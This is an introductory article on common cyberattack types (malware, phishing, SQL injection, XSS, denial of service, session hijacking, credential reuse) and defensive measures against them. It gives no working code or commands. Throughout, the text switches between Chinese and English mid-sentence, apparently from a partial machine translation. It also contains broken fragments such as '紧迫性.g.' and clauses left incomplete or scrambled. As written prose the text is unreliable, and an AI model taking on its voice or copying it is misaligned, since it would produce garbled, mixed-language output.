课题概述
一个网络攻击 – also known as a cybersecurity attack – is any form of malicious activity targeting IT systems and/or the people using them to gain unauthorized access to systems and data they contain.
犯罪分子通常希望利用攻击来获取经济利益, but in other cases the aim is to disrupt operations by disabling access to IT systems. Threat actors can be anyone from a single person attempting to obtain stolen credentials and hold them for ransom to a 国家资助的 特遣队想要破坏外国领土上的行动. 不管是什么动机, most IT networks – and the people that maintain them – will experience some type of attack over the course of their lives and must be prepared.
If you've ever studied famous battles in history, you'll know that no two are exactly alike. 但随着时间的推移,有些策略被证明是有效的. 类似的, 当一个罪犯试图入侵一个组织时, 除非绝对必要,否则他们不会尝试新鲜事物. 他们利用了众所周知非常有效的普通黑客技术, 比如恶意软件, 网络钓鱼, 或跨站点脚本(XSS).
Whether you're trying to make sense of the latest data-breach headline in the news or analyzing an incident in your own organization, 它有助于理解不同的攻击向量. 让我们来看看一些最常见的类型 网络攻击 今天看到的.
恶意软件是指各种形式的有害软件,如病毒和 ransomware. 一次 恶意软件 在你的电脑里, 它可以造成各种各样的破坏, 控制你的机器, 监视您的操作和击键, to silently sending all sorts of confidential data from your computer or network to the attacker's home base.
攻击者将使用各种方法将恶意软件植入您的计算机, but at some stage it often requires the user to take an action to install the 恶意软件. 这可以包括单击链接下载文件, 或者打开一个看起来无害的电子邮件附件(比如文档或PDF), 但实际上包含一个隐藏的恶意软件安装程序.
在一个 钓鱼攻击, 攻击者可能会向您发送一封看似来自您信任的人的电子邮件, 比如你的老板或与你做生意的公司. 这封邮件看起来是合法的,而且有一些紧迫性.g. 在您的账户上检测到欺诈活动). 在电子邮件中,可能有一个附件要打开或链接要点击.
Upon opening the malicious attachment, you'll unknowingly install 恶意软件 in your computer. 如果你点击链接, it may send you to a legitimate-looking website that asks you to log in to access an important file – except the website is actually a trap used to capture your credentials. 打击网络钓鱼企图, it’s essential to understand the importance of verifying email senders and attachments or links.
An SQL注入攻击 specifically targets servers storing critical website and service data using malicious code to get the server to divulge information it normally wouldn’t. SQL (structured query language) is a programming language used to communicate with databases, 并可用于存储私人客户信息,如信用卡号码, 用户名和密码(凭证), or other personally identifiable information (PII) – all tempting and lucrative targets for an attacker.
An SQL注入攻击 works by exploiting any one of the known SQL vulnerabilities that allow the SQL server to run malicious code. 例如, SQL server是否容易受到注入攻击, it may be possible for an attacker to go to a website's search box and type in code that would force the site's SQL server to dump all of its stored usernames and passwords.
跨站点脚本(XSS)攻击 还包括向网站注入恶意代码, 但在这种情况下,网站本身并没有受到攻击. 而不是, the malicious code only runs in the user's browser when they visit the attacked website, 它在哪里直接针对访问者.
One of the most common ways an attacker can deploy an XSS attack is by injecting malicious code into a comment or a script that could automatically run. 例如, they could embed a link to a malicious JavaScript in a comment on a blog. Cross-site scripting attacks can significantly damage a website's reputation by placing users' information at risk without indication anything malicious has occurred.
拒绝服务(DoS)攻击 用超出网站承载能力的流量淹没网站, thereby overloading the site’s server and making it near-impossible to serve content to visitors. 出于非恶意原因拒绝服务是可能的. 例如, if a massive news story breaks and a news organization’s site is overloaded with traffic from people trying to learn more about the story.
虽然经常, 这种流量过载是恶意的, as an attacker floods a website with an overwhelming amount of traffic to essentially shut it down for all users. In some instances, these DoS attacks are performed by many computers at the same time. 这种攻击场景被称为分布式拒绝服务攻击(DDoS)。.
Session hijacking occurs when an attacker hijacks a session by capturing the unique – and private – session ID and poses as the computer making a request, allowing them to log in as an unsuspecting user and gain access to unauthorized information on the web server. 如果在任何互联网会话中一切正常, web servers should respond to your various requests by giving you the information you're attempting to access.
然而, 攻击者可以使用许多方法来窃取会话ID, 例如用于劫持会话id的跨站点脚本攻击. An attacker can also opt to hijack the session to insert themselves between the requesting computer and the remote server, 假装自己是会议的另一方. This allows them to intercept information in both directions and is commonly called a 中间人(MITM)攻击.
当有人在多个网站上使用相同的凭据时,就会发生凭据重用. It can make life easier in the moment, but can come back to haunt that user later on. Even though security best practices universally recommend unique passwords for all applications and websites, 许多人仍然重复使用他们的密码——这是攻击者很容易利用的事实.
一旦攻击者收集了 妥协的凭证 from a breached website or service (easily acquired on any number of black market websites on the internet), they know there’s a good chance they’ll be able to use those credentials somewhere online. 当谈到证书时,多样性是必不可少的. Password managers are available and can be helpful when it comes to generating and managing unique passwords for every corner of the internet.
我们可以涵盖成千上万的战术和技巧,以防止大规模的网络攻击, 但让我们放大来看一些关键的例子:
网络钓鱼意识培训: Educate employees on why 网络钓鱼 is harmful and empower them to detect and report 网络钓鱼 attempts. 这种类型的培训包括电子邮件 模拟网络钓鱼活动 to employees, monitoring results, reinforcing training, and improving on simulation results.
受损凭证检测:利用 用户行为分析 为网络上的正常活动创建基线. 然后, 监视管理员和服务帐户的使用情况, 哪些用户不恰当地共享凭据, 以及攻击者是否已经从最初的入侵扩展到您的网络.
Ransomware预防制定一个三点计划来 防止勒索软件攻击. 这包括最小化攻击面, 一旦检测到暴露,减轻潜在影响, 并进行汇报,以查明现有计划的差距. 从那里, 团队可以重建系统, 检疫端点, 更改凭证, 锁定受损账户.
防范XSS攻击:建立一个过滤策略,外部数据将通过该策略. 这将有助于在恶意脚本成为问题之前捕获它们. This leads into creating a wider content security policy that can leverage a list of trusted sources that are able to access your web applications.
威胁情报计划: Create a central hub that feeds all security-organization functions with knowledge and data on the highest-priority threats. 组织严重依赖自动化来帮助扩展a 威胁情报计划 通过不断地将数据输入安全设备和过程, 不需要人为干预.